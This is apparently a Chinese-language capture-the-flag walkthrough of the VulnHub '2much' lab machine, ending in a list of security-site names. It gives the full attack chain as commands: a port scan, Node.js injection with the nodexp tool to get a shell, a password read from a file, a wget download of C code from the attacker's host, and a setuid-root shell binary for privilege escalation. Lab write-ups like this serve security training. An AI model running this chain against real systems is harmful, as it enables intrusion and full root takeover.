今天實踐的是vulnhub的2much鏡像,
下載地址,https://download.vulnhub.com/2much/2much.tar.gz,
用virtualbox導入成功,
直接能看到靶機地址192.168.0.187,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

8081端口上有node.js服務,

kali攻擊機上下載攻擊項目源碼,
git clone https://github.com/esmog/nodexp.git,開始攻擊,
python2 nodexp.py --url="http://192.168.0.187:8081/?name=[INJECT_HERE]",

獲取到shell,session -i 2,轉成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
在/home/4ndr34z/ftp目錄里查看tdl.txt文件,
獲取到密碼3236$fsdfzcv_cs,

查看歷史命令,發現這個密碼是用來登錄docker實例的,

登錄進去看看,ssh root@127.0.0.1 -p23,
看來docker實例是跟外面有文件共享的,

在kali攻擊機上做個攻擊腳本,
vim exploit.c
int main(void){
setgid(0); setuid(0);
execl("/bin/sh","sh",0);
}
再開個http下載服務,python2 -m SimpleHTTPServer,
在靶機上下載這個文件,
wget http://192.168.0.186:8000/exploit.c,
編譯成可執行文件,gcc exploit.c -o exploit,
再次登錄到docker實例中,
把看到的可執行文件拷貝到新文件,cp exploit poc,
給新的可執行文件修改權限,chmod 4755 poc,
再回到靶機,執行這個新的可執行文件,./poc,id確認是root,

看雪學苑
安全圈
一顆小胡椒
看雪學苑
LemonSec
系統安全運維
合天網安實驗室
合天網安實驗室
看雪學苑
一顆小胡椒
Coremail郵件安全
ManageEngine卓豪